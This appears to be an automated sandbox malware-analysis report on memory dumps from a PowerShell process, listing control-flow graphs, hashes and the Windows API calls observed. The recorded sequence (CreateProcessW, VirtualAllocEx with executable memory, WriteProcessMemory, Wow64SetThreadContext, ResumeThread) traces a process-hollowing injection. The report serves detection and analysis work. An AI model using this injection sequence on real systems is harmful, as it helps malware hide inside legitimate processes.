                                                                                                                          control_flow_graph 0 44c9b40-44c9bf1 4 44ca1fc-44ca291 0->4 5 44c9bf7-44c9bfc 0->5 14 44ca299-44ca2a0 4->14 15 44ca293-44ca296 4->15 6 44c9bfe-44c9c08 5->6 7 44c9c0a 5->7 8 44c9c0f-44c9c11 6->8 7->8 10 44c9c2b-44c9c4e call 44c86f8 8->10 11 44c9c13-44c9c25 8->11 20 44c9c54-44c9c69 10->20 21 44ca185-44ca198 10->21 11->10 18 44ca2ab-44ca2c1 14->18 19 44ca2a2-44ca2a8 14->19 15->14 22 44ca2cc-44ca36f CreateProcessW 18->22 23 44ca2c3-44ca2c9 18->23 19->18 29 44c9c6f-44c9c93 20->29 30 44ca096 20->30 36 44ca19f-44ca1b5 21->36 27 44ca378-44ca3f0 22->27 28 44ca371-44ca377 22->28 23->22 58 44ca402-44ca409 27->58 59 44ca3f2-44ca3f8 27->59 28->27 29->36 40 44c9c99-44c9cac call 44c8704 29->40 35 44ca09b-44ca0ae 30->35 49 44ca0b5-44ca0c8 35->49 36->4 51 44ca1b7-44ca1bf 36->51 47 44ca16b-44ca17e 40->47 48 44c9cb2-44c9cbc 40->48 47->21 48->36 52 44c9cc2-44c9cdf 48->52 76 44ca0cf-44ca0e2 49->76 62 44ca1c8-44ca1d5 51->62 63 44ca1c1-44ca1c3 call 44c7a50 51->63 52->30 56 44c9ce5-44c9cff call 44c8710 52->56 72 44c9d05-44c9d0e 56->72 73 44ca151-44ca164 56->73 60 44ca40b-44ca41a 58->60 61 44ca420 58->61 59->58 60->61 70 44ca421 61->70 80 44ca1dc-44ca1f9 62->80 81 44ca1d7 62->81 63->62 70->70 74 44c9d6f-44c9d75 72->74 75 44c9d10-44c9d54 72->75 73->47 74->30 77 44c9d7b-44c9d8b 74->77 85 44c9d5d-44c9d69 75->85 86 44c9d56-44c9d5c 75->86 92 44ca0e9-44ca0fc 76->92 77->30 89 44c9d91-44c9de4 VirtualAllocEx 77->89 81->80 85->74 88 44ca137-44ca14a 85->88 86->85 88->73 95 44c9ded-44c9e0f 89->95 96 44c9de6-44c9dec 89->96 112 44ca103-44ca116 92->112 99 44c9e7c-44c9e83 95->99 100 44c9e11-44c9e63 VirtualAllocEx 95->100 96->95 101 44ca11d-44ca130 99->101 102 44c9e89-44c9ea4 call 44c871c 99->102 104 44c9e6c-44c9e76 100->104 105 44c9e65-44c9e6b 100->105 101->88 111 44c9eaa-44c9eb3 102->111 102->112 104->99 105->104 111->30 114 44c9eb9-44c9ebf 111->114 112->101 114->30 115 44c9ec5-44c9ed0 114->115 115->30 119 44c9ed6-44c9ee0 115->119 120 44c9ee6-44c9eeb 119->120 121 44c9fb0-44c9fc1 119->121 120->30 122 44c9ef1-44c9f04 120->122 121->30 124 44c9fc7-44c9fdb call 44c871c 121->124 122->30 127 44c9f0a-44c9f19 122->127 124->76 130 44c9fe1-44c9fe7 124->130 127->30 131 44c9f1f-44c9f2f 127->131 130->30 132 44c9fed-44c9ffe 130->132 135 44c9f31-44c9f34 131->135 136 44c9f92-44c9f95 131->136 137 44ca009-44ca011 132->137 138 44ca000-44ca003 132->138 135->30 139 44c9f3a-44c9f3d 135->139 136->30 141 44c9f9b-44c9f9e 136->141 137->30 140 44ca017-44ca021 137->140 138->137 139->30 143 44c9f43-44c9f71 139->143 140->36 144 44ca027-44ca039 call 44c8728 140->144 141->30 142 44c9fa4-44c9faa 141->142 142->120 142->121 143->30 153 44c9f77-44c9f85 call 44c871c 143->153 144->49 148 44ca03b-44ca079 ResumeThread 144->148 149 44ca07b-44ca081 148->149 150 44ca082-44ca08f 148->150 149->150 150->35 152 44ca091 150->152 152->81 156 44c9f8a-44c9f8c 153->156 156->92 156->136
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 044C9DCD
                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 044C9E4C
                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 044CA062
                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 044CA35C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual$CreateProcessResumeThread
                                                                                                                          • String ID: lX
                                                                                                                          • API String ID: 1213262536-2093460002
                                                                                                                          • Opcode ID: ceb5439ce5582a9a82e49203d59043a2d94e59234ebf20a70e0bde1ba63f9868
                                                                                                                          • Instruction ID: ca14202f1d449b0efd7ecc70332f281c4111e3ba0ac90761a680d142c4b1b5bd
                                                                                                                          • Opcode Fuzzy Hash: ceb5439ce5582a9a82e49203d59043a2d94e59234ebf20a70e0bde1ba63f9868
                                                                                                                          • Instruction Fuzzy Hash: 24328E74A002189FDF65DF65C844B9EBBB2BF84344F18819AD509BB391DB30AE85CF51

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 437 7230b38-7230b4a 438 7230b50-7230b61 437->438 439 7230c0a-7230c28 437->439 442 7230b63-7230b69 438->442 443 7230b7b-7230b98 438->443 444 7230c04-7230c07 439->444 445 7230c2a-7230c84 439->445 446 7230b6b 442->446 447 7230b6d-7230b79 442->447 443->439 451 7230b9a-7230bbc 443->451 462 7230cb1-7230cb6 445->462 463 7230c86-7230c94 445->463 446->443 447->443 455 7230bd6-7230bee 451->455 456 7230bbe-7230bc4 451->456 464 7230bf0-7230bf2 455->464 465 7230bfc-7230c03 455->465 457 7230bc6 456->457 458 7230bc8-7230bd4 456->458 457->455 458->455 462->463 468 7230c9c-7230cab 463->468 464->465 465->444 468->462
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 84Tj$84Tj
                                                                                                                          • API String ID: 0-1570688683
                                                                                                                          • Opcode ID: c3fe4e61fbc311d378037d9876cd12bcf5463adfbbfd5e066d0fb164b2aa52c5
                                                                                                                          • Instruction ID: 6739407bd82c12988aae9abd8bc23b2245e21b84da3ac14942db7a94c73b1fe9
                                                                                                                          • Opcode Fuzzy Hash: c3fe4e61fbc311d378037d9876cd12bcf5463adfbbfd5e066d0fb164b2aa52c5
                                                                                                                          • Instruction Fuzzy Hash: 274124B0B10365AFDB309B648814B6ABFB3AF85714F18805AE545EF392DA71EC41C7B1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 469 44c86f8-44ca291 471 44ca299-44ca2a0 469->471 472 44ca293-44ca296 469->472 473 44ca2ab-44ca2c1 471->473 474 44ca2a2-44ca2a8 471->474 472->471 475 44ca2cc-44ca36f CreateProcessW 473->475 476 44ca2c3-44ca2c9 473->476 474->473 478 44ca378-44ca3f0 475->478 479 44ca371-44ca377 475->479 476->475 486 44ca402-44ca409 478->486 487 44ca3f2-44ca3f8 478->487 479->478 488 44ca40b-44ca41a 486->488 489 44ca420 486->489 487->486 488->489 491 44ca421 489->491 491->491
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 044CA35C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 24890dc8b4794d690550c2778b826fc098dc2a1a673b10d0a5e7d74d2725d76b
                                                                                                                          • Instruction ID: 350c9fabf021d9f2d968c617d2eae7ad2284d5be191fcded0f2457e2a83df395
                                                                                                                          • Opcode Fuzzy Hash: 24890dc8b4794d690550c2778b826fc098dc2a1a673b10d0a5e7d74d2725d76b
                                                                                                                          • Instruction Fuzzy Hash: 6E513B75901229DFEF24CF99C840BDDBBB5BF48304F1484AAE909B7250D771AA85CF90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 492 44c871c-44ca92e 494 44ca938-44ca971 WriteProcessMemory 492->494 495 44ca930-44ca936 492->495 496 44ca97a-44ca99b 494->496 497 44ca973-44ca979 494->497 495->494 497->496
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1867197F,00000000,?,?,?,00000000,00000000,?,044C9EA2,?,00000000,?), ref: 044CA964
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 8e2bc32798a3f71942690f5c7778164e600e45cdb8edf918df6579daffdd11cd
                                                                                                                          • Instruction ID: 990bfc48fddadaf2281cc71a0f8bb6c8352746afa005c462dd2523193d284aa3
                                                                                                                          • Opcode Fuzzy Hash: 8e2bc32798a3f71942690f5c7778164e600e45cdb8edf918df6579daffdd11cd
                                                                                                                          • Instruction Fuzzy Hash: 3121E4B69013499FDB10CF9AD885BDEBBF4FB48310F54842AE958A7210D378A944CBA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 499 44ca8e0-44ca92e 501 44ca938-44ca971 WriteProcessMemory 499->501 502 44ca930-44ca936 499->502 503 44ca97a-44ca99b 501->503 504 44ca973-44ca979 501->504 502->501 504->503
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1867197F,00000000,?,?,?,00000000,00000000,?,044C9EA2,?,00000000,?), ref: 044CA964
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: d5cc5d063b693f9f8e29afb0a95fe96c19dffaa687e2abaef08692d88264dcb4
                                                                                                                          • Instruction ID: 060262a67af0e68f99a6461b29c164b7b0cc56c5f23a0295263ca3adddc7de05
                                                                                                                          • Opcode Fuzzy Hash: d5cc5d063b693f9f8e29afb0a95fe96c19dffaa687e2abaef08692d88264dcb4
                                                                                                                          • Instruction Fuzzy Hash: 9621F5B6900349DFDB10CF9AD885BDEBBF4FB48310F54842AE958A7200D378A544CB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 506 44c8704-44ca498 508 44ca49a-44ca4a2 506->508 509 44ca4a4-44ca4d0 Wow64SetThreadContext 506->509 508->509 510 44ca4d9-44ca4fa 509->510 511 44ca4d2-44ca4d8 509->511 511->510
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: 6252fb841cee6745c55f3906e594e5be75201058cacf820add9e50f818786fd6
                                                                                                                          • Instruction ID: 399f75bbf28f13dad18312983735c4b41ddc4190ad530e368b18449345b41495
                                                                                                                          • Opcode Fuzzy Hash: 6252fb841cee6745c55f3906e594e5be75201058cacf820add9e50f818786fd6
                                                                                                                          • Instruction Fuzzy Hash: E61129B6D002498FDB10DF9AD449BDEBBF4EB88320F54842AD458B3700D778A545CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 513 44c8728-44ca498 515 44ca49a-44ca4a2 513->515 516 44ca4a4-44ca4d0 Wow64SetThreadContext 513->516 515->516 517 44ca4d9-44ca4fa 516->517 518 44ca4d2-44ca4d8 516->518 518->517
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: baf9535bbeb1433168e61921e45045bede0e4db902f1727a8dfb6f9779a31c73
                                                                                                                          • Instruction ID: 9e8ba0a0c12ff7df777f4eb30bb9d97889f40f89e52e231df99f544f604e2365
                                                                                                                          • Opcode Fuzzy Hash: baf9535bbeb1433168e61921e45045bede0e4db902f1727a8dfb6f9779a31c73
                                                                                                                          • Instruction Fuzzy Hash: A81129B6D002498FDB10DF9AD449BDEBBF5EB88320F14802AD458B3700D778A545CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 520 44ca450-44ca498 522 44ca49a-44ca4a2 520->522 523 44ca4a4-44ca4d0 Wow64SetThreadContext 520->523 522->523 524 44ca4d9-44ca4fa 523->524 525 44ca4d2-44ca4d8 523->525 525->524
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: 551d6dddca7fd5e6494cd498ee76295e210c854dde66eb4e16454307f421d81e
                                                                                                                          • Instruction ID: 1c04ae68d94f673419ed0283df7a086bb662dba1eb5a58bed1283ced438b957e
                                                                                                                          • Opcode Fuzzy Hash: 551d6dddca7fd5e6494cd498ee76295e210c854dde66eb4e16454307f421d81e
                                                                                                                          • Instruction Fuzzy Hash: 2E1114B6D003498FDB10CF9AC945BDEBBF9EB88320F54842AD458A3600D378A545CFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6401436433ebb16e170a3c89bbb7bef01ceb34c7ee7cb92aa63c3a620c96dec
                                                                                                                          • Instruction ID: 1e811efddf4a7622f76b6d620552b8af70894d7edbf52723f4ad1c262387bf83
                                                                                                                          • Opcode Fuzzy Hash: b6401436433ebb16e170a3c89bbb7bef01ceb34c7ee7cb92aa63c3a620c96dec
                                                                                                                          • Instruction Fuzzy Hash: 241211F1B2430ADFDB24CF68C850BAABBF2BF86210F14806AD555CB251DB75C945CBA1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1313 7231778-723179e 1314 72317a4-72317a9 1313->1314 1315 723194a-7231964 1313->1315 1316 72317c1-72317c5 1314->1316 1317 72317ab-72317b1 1314->1317 1323 7231966-7231992 1315->1323 1324 72319ab-72319b3 1315->1324 1321 72318f6-7231900 1316->1321 1322 72317cb-72317cd 1316->1322 1318 72317b3 1317->1318 1319 72317b5-72317bf 1317->1319 1318->1316 1319->1316 1327 7231902-723190b 1321->1327 1328 723190e-7231914 1321->1328 1325 72317cf-72317db 1322->1325 1326 72317dd 1322->1326 1330 7231ac4-7231af5 1323->1330 1331 7231998-723199d 1323->1331 1337 72319b5-72319b9 1324->1337 1332 72317df-72317e1 1325->1332 1326->1332 1333 7231916-7231918 1328->1333 1334 723191a-7231926 1328->1334 1352 7231af7-7231b03 1330->1352 1353 7231b05 1330->1353 1331->1337 1338 723199f-72319a5 1331->1338 1332->1321 1339 72317e7-72317eb 1332->1339 1335 7231928-7231947 1333->1335 1334->1335 1343 7231a76-7231a80 1337->1343 1344 72319bf-72319c1 1337->1344 1346 72319a7 1338->1346 1347 72319a9 1338->1347 1340 72317fe 1339->1340 1341 72317ed-72317fc 1339->1341 1348 7231800-7231802 1340->1348 1341->1348 1354 7231a82-7231a8a 1343->1354 1355 7231a8d-7231a93 1343->1355 1350 72319c3-72319cf 1344->1350 1351 72319d1 1344->1351 1346->1337 1347->1324 1348->1321 1356 7231808-723180a 1348->1356 1357 72319d3-72319d5 1350->1357 1351->1357 1358 7231b07-7231b09 1352->1358 1353->1358 1359 7231a95-7231a97 1355->1359 1360 7231a99-7231aa5 1355->1360 1361 723181a 1356->1361 1362 723180c-7231818 1356->1362 1357->1343 1364 72319db-72319dd 1357->1364 1365 7231b77-7231b81 1358->1365 1366 7231b0b-7231b2a 1358->1366 1367 7231aa7-7231ac1 1359->1367 1360->1367 1368 723181c-723181e 1361->1368 1362->1368 1371 72319f7-72319f9 1364->1371 1372 72319df-72319e5 1364->1372 1369 7231b83-7231b87 1365->1369 1370 7231b8a-7231b90 1365->1370 1400 7231b3a 1366->1400 1401 7231b2c-7231b38 1366->1401 1368->1321 1375 7231824-7231826 1368->1375 1376 7231b92-7231b94 1370->1376 1377 7231b96-7231ba2 1370->1377 1381 7231a00-7231a02 1371->1381 1378 72319e7 1372->1378 1379 72319e9-72319f5 1372->1379 1382 7231840-723184b 1375->1382 1383 7231828-723182e 1375->1383 1384 7231ba4-7231bc2 1376->1384 1377->1384 1378->1371 1379->1371 1385 7231a04-7231a0a 1381->1385 1386 7231a1a-7231a73 1381->1386 1393 723185a-7231866 1382->1393 1394 723184d-7231850 1382->1394 1388 7231832-723183e 1383->1388 1389 7231830 1383->1389 1397 7231a0e-7231a10 1385->1397 1398 7231a0c 1385->1398 1388->1382 1389->1382 1395 7231874-7231884 1393->1395 1396 7231868-723186a 1393->1396 1394->1393 1408 7231886-723188c 1395->1408 1409 723189c-72318f3 1395->1409 1396->1395 1397->1386 1398->1386 1403 7231b3c-7231b3e 1400->1403 1401->1403 1403->1365 1405 7231b40-7231b5d 1403->1405 1414 7231bc5-7231bca 1405->1414 1415 7231b5f-7231b71 1405->1415 1411 7231890-7231892 1408->1411 1412 723188e 1408->1412 1411->1409 1412->1409 1414->1415 1415->1365
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 118594b4e4a95748caa5de97dde5e75804e4d766e5b58f6ebfa51d26fbd3176e
                                                                                                                          • Instruction ID: a48504912e37080c82e0ab101a2d41e399e438affadcf3e79dea343c8731c998
                                                                                                                          • Opcode Fuzzy Hash: 118594b4e4a95748caa5de97dde5e75804e4d766e5b58f6ebfa51d26fbd3176e
                                                                                                                          • Instruction Fuzzy Hash: 06B148F172470FDFDB258F29881076ABBB6AF82211F24806BD445CB241EB75C961C762

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1417 72303e0-7230403 1418 7230409-723040e 1417->1418 1419 72305de-7230623 1417->1419 1420 7230410-7230416 1418->1420 1421 7230426-723042a 1418->1421 1429 723077a-72307ac 1419->1429 1430 7230629-723062e 1419->1430 1425 723041a-7230424 1420->1425 1426 7230418 1420->1426 1422 7230430-7230434 1421->1422 1423 723058b-7230595 1421->1423 1427 7230447 1422->1427 1428 7230436-7230445 1422->1428 1431 72305a3-72305a9 1423->1431 1432 7230597-72305a0 1423->1432 1425->1421 1426->1421 1435 7230449-723044b 1427->1435 1428->1435 1459 72307ae-72307ba 1429->1459 1460 72307bc 1429->1460 1436 7230630-7230636 1430->1436 1437 7230646-723064a 1430->1437 1433 72305ab-72305ad 1431->1433 1434 72305af-72305bb 1431->1434 1439 72305bd-72305db 1433->1439 1434->1439 1435->1423 1442 7230451-7230471 1435->1442 1444 723063a-7230644 1436->1444 1445 7230638 1436->1445 1440 7230650-7230652 1437->1440 1441 7230727-7230731 1437->1441 1447 7230662 1440->1447 1448 7230654-7230660 1440->1448 1449 7230733-723073c 1441->1449 1450 723073f-7230745 1441->1450 1469 7230473-723048e 1442->1469 1470 7230490 1442->1470 1444->1437 1445->1437 1452 7230664-7230666 1447->1452 1448->1452 1456 7230747-7230749 1450->1456 1457 723074b-7230757 1450->1457 1452->1441 1458 723066c-7230670 1452->1458 1461 7230759-7230777 1456->1461 1457->1461 1463 7230672-723068e 1458->1463 1464 7230690 1458->1464 1467 72307be-72307c0 1459->1467 1460->1467 1471 7230692-7230694 1463->1471 1464->1471 1472 72307c2-72307c8 1467->1472 1473 72307e0-72307ea 1467->1473 1474 7230492-7230494 1469->1474 1470->1474 1471->1441 1478 723069a-72306b5 1471->1478 1475 72307d6-72307dd 1472->1475 1476 72307ca-72307cc 1472->1476 1479 72307f4-72307fa 1473->1479 1480 72307ec-72307f1 1473->1480 1474->1423 1481 723049a-723049c 1474->1481 1476->1475 1497 72306b7-72306bd 1478->1497 1498 72306cd-7230724 1478->1498 1482 7230800-723080c 1479->1482 1483 72307fc-72307fe 1479->1483 1487 723049e-72304aa 1481->1487 1488 72304ac 1481->1488 1489 723080e-7230825 1482->1489 1483->1489 1491 72304ae-72304b0 1487->1491 1488->1491 1491->1423 1495 72304b6-72304d6 1491->1495 1506 72304d8-72304de 1495->1506 1507 72304ee-72304f2 1495->1507 1500 72306c1-72306c3 1497->1500 1501 72306bf 1497->1501 1500->1498 1501->1498 1508 72304e2-72304e4 1506->1508 1509 72304e0 1506->1509 1510 72304f4-72304fa 1507->1510 1511 723050c-7230510 1507->1511 1508->1507 1509->1507 1512 72304fe-723050a 1510->1512 1513 72304fc 1510->1513 1514 7230517-7230519 1511->1514 1512->1511 1513->1511 1516 7230531-7230588 1514->1516 1517 723051b-7230521 1514->1517 1518 7230523 1517->1518 1519 7230525-7230527 1517->1519 1518->1516 1519->1516
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2846964d9e09315ddb9cd366a8274a64f01ff2552127aa32af60d9178b36499
                                                                                                                          • Instruction ID: f91aa578faf56f5e3b74dc5160b1221ec04cba53e2b7102bd9feac011fbed2ef
                                                                                                                          • Opcode Fuzzy Hash: e2846964d9e09315ddb9cd366a8274a64f01ff2552127aa32af60d9178b36499
                                                                                                                          • Instruction Fuzzy Hash: A5B134F1B202078FEB348B69841077ABBE7AFC6211F24806BD445DB252DB75C941CBB1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 906b3a7337a29eb126daff1406f4df75bd1ff079f8f9295d8d97ff4482900bc1
                                                                                                                          • Instruction ID: d6258e6149b8126bdb228f2123d66bf323830a619dd4d66c9571e6f918649d93
                                                                                                                          • Opcode Fuzzy Hash: 906b3a7337a29eb126daff1406f4df75bd1ff079f8f9295d8d97ff4482900bc1
                                                                                                                          • Instruction Fuzzy Hash: 1931C3F1A34207DFEB308E2585107AA7BA6AF92215F144067D914DB292DB75CA81CBB1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 451d732acfa5981ae3c827c3acd599ae950b9ef3b47147c3258d008a20b95e63
                                                                                                                          • Instruction ID: 86d4067f5d9e0212165be138699365358139edcce97eb4bf01c8fa91f2a6b7f1
                                                                                                                          • Opcode Fuzzy Hash: 451d732acfa5981ae3c827c3acd599ae950b9ef3b47147c3258d008a20b95e63
                                                                                                                          • Instruction Fuzzy Hash: B721AEF0A20207DFEF24CF69C544B6AB7F1FF85210F18806AD9089B221E735D984CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e14ade0029b0fb2dbe77a11c706332ffed8d46b85ff6e7ee4b30cf42bcde7a35
                                                                                                                          • Instruction ID: b556bd74c23b84ae5ba1d826e8862928cfcd34c4d5c54c810673571a9d57866c
                                                                                                                          • Opcode Fuzzy Hash: e14ade0029b0fb2dbe77a11c706332ffed8d46b85ff6e7ee4b30cf42bcde7a35
                                                                                                                          • Instruction Fuzzy Hash: 4111A1706092419FD315CB94D864A96FBB2EF86214B19C0DBD558CF293CB32DC42CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_7230000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3d5148db05c75828a4163f25f5c4225bd626b01e58c77f322e10e6498c8857e7
                                                                                                                          • Instruction ID: 97ee9dadb8ae47482ce36aa75dcb4cb20f5ce93571fae77a127d41d964c3159e
                                                                                                                          • Opcode Fuzzy Hash: 3d5148db05c75828a4163f25f5c4225bd626b01e58c77f322e10e6498c8857e7
                                                                                                                          • Instruction Fuzzy Hash: 7401E2A615E3D19FE7134770886519A3FB29D4721035A01CBD0D1CF1E3DA28594AC7B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1698925490.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_b0d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 91ddabb939a6ed2a758b842d9259f0941aa576e1909ce10db5963f7306cf4951
                                                                                                                          • Instruction ID: d9404254db57d9a81a5bf237fe93bfdccb9796435e0312141961bb7bad56de34
                                                                                                                          • Opcode Fuzzy Hash: 91ddabb939a6ed2a758b842d9259f0941aa576e1909ce10db5963f7306cf4951
                                                                                                                          • Instruction Fuzzy Hash: 05019E7240E3C05FE7124B218C94792BFA8EF53224F1984DBE8888F1E3D2685C45CB72
                                                                                                                          Memory Dump Source
